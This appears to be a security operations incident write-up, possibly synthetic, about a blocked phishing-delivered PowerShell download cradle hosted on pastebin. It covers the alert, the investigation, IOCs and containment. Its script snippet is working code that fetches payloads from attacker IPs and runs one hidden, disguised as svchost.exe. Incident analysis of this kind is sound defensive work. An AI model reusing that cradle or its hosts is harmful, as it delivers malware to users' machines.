Zscaler Alert Details
Alert ID: ZSCALER-STAGE-CAP-7842
Alert Time: 2024-02-11 09:45:18 EST
Severity: HIGH (78/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Suspicious File Download – Potential Payload Staging”
MITRE ATT&CK: T1608 – Stage Capabilities
Alert Details:
Transaction Details:
– User: jdoe@company.com (John Doe, Marketing)
– Device: MKT-WS-023 (Windows 11)
– Time: 09:42 EST
– Action: BLOCKED (Advanced Threat Protection)
URL: hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
File Name: update_installer.ps1
File Type: PowerShell Script
File Size: 24 KB
Threat Analysis:
– Zscaler Sandbox: MALICIOUS (confidence 92%)
– Threat Name: “PowerShell_Download_Cradle”
– Behavior: Script downloads additional payload from multiple URLs
– URLs Embedded:
– hxxp://185.143.221[.]45/beacon.dll
– hxxps://storage.googleapis.com/company-updates/msupdate.exe (Google Storage abuse)
– hxxp://194.165.16[.]89/loader.bin
Script Analysis Snippet:
$urls = @( “http://185.143.221[.]45/beacon.dll”, “https://storage.googleapis.com/company-updates/msupdate.exe”, “http://194.165.16[.]89/loader.bin” ) $path = “$env:TEMP\svchost.exe” foreach ($u in $urls) { try { Invoke-WebRequest -Uri $u -OutFile $path if ((Get-FileHash $path).Hash -eq “a1b2c3d4e5f6…”) { Start-Process $path -WindowStyle Hidden break } } catch {} }
Additional Context:
– User accessed pastebin.com via corporate network
– Domain pastebin.com categorized as “Information Technology” (allowed)
– Specific raw URL not previously known; first request
– Download blocked before reaching endpoint
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler sandbox analysis
Zscaler Admin Console
Confirmed malicious PowerShell download cradle
2. Endpoint Check
Verify if any part of script executed
CrowdStrike Falcon
No evidence of execution; block was successful
3. User Interview
Contact user about pastebin access
Teams, Phone
User clicked link in phishing email; reported suspicious email
4. Email Investigation
Find source of link
Proofpoint, M365 Defender
Email from “security@update-company[.]net” with link
5. Infrastructure Blocking
Block all associated IOCs
Zscaler, Palo Alto, Cisco Umbrella
Added URLs/IPs to blocklists
6. Threat Hunting
Search for similar download attempts
Splunk, Zscaler Logs
No other users accessed same URL
Jira Incident Report
Ticket: SOC-2024-056
Summary: T1608 – PowerShell Download Cradle Blocked During Staging Phase
Status: RESOLVED
Resolution: MALICIOUS – Payload Blocked
Priority: P2 – MEDIUM
Labels: T1608, stage-capabilities, powershell, download-cradle, zscaler
Components: Web-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA) Advanced Threat Protection.
Alert: “Suspicious File Download – Potential Payload Staging”.
User: jdoe@company.com (Marketing Department).
Time: 2024-02-11 09:45 EST.
Technique: MITRE ATT&CK T1608 – Stage Capabilities.
2. Technical Analysis:
Staging Activity:
URL: hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
File: update_installer.ps1 (PowerShell download cradle)
Action: BLOCKED by Zscaler before reaching endpoint
User Action: Clicked link in phishing email
Payload Details:
Script designed to download and execute additional malware
Embedded URLs:
hxxp://185.143.221[.]45/beacon.dll (Cobalt Strike)
hxxps://storage.googleapis.com/company-updates/msupdate.exe (Google Storage abused)
hxxp://194.165.16[.]89/loader.bin (Unknown loader)
Hash validation to ensure correct payload
Executes from temp folder masquerading as svchost.exe
Infrastructure Analysis:
IP 185.143.221[.]45: Bulgaria VPS, known for Cobalt Strike C2
IP 194.165.16[.]89: Romania VPS, associated with TA577
Google Storage bucket: storage.googleapis.com/company-updates/ (abused)
Email Source:
Phishing email from security@update-company[.]net
Subject: “Critical Security Update Required”
Link to pastebin URL
Email quarantined by Proofpoint after user reported
3. Investigation Findings:
Timeline:
09:40 – User receives phishing email
09:41 – User clicks link to pastebin
09:42 – Zscaler blocks PowerShell script download
09:45 – Zscaler alert generated
09:47 – SOC begins investigation
09:50 – User interviewed; confirms suspicious email
09:55 – Email quarantined; IOCs blocked
Indicators of Compromise (IoCs):
URLs:
– hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
– hxxp://185.143.221[.]45/beacon.dll
– hxxps://storage.googleapis.com/company-updates/msupdate.exe
– hxxp://194.165.16[.]89/loader.bin
IPs:
– 185.143.221[.]45
– 194.165.16[.]89
Email:
– sender: security@update-company[.]net
– subject: “Critical Security Update Required”
4. Containment Actions:
Immediate Actions:
All IOCs added to Zscaler, Palo Alto, and Cisco Umbrella blocklists.
Email quarantined and purged from all mailboxes.
User’s workstation scanned (no compromise).
User Education:
User commended for reporting suspicious email.
Reinforced training on link verification.
5. Root Cause Analysis:
Primary Cause: Phishing email luring user to download staged payload.
Contributing Factors: Pastebin allowed content; user clicked link.
6. Business Impact: None – payload blocked before execution.
7. Remediation & Prevention:
Completed Actions:
IOCs blocked.
User educated.
Enhanced Zscaler policy to block pastebin raw URLs.
8. Conclusion:
Attackers staged a PowerShell download cradle on pastebin and attempted to lure a user via phishing. Zscaler blocked the download, preventing payload retrieval. No compromise occurred.
Closure Rationale: Payload blocked; user safe; IOCs added to blocklists.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-11 10:30 EST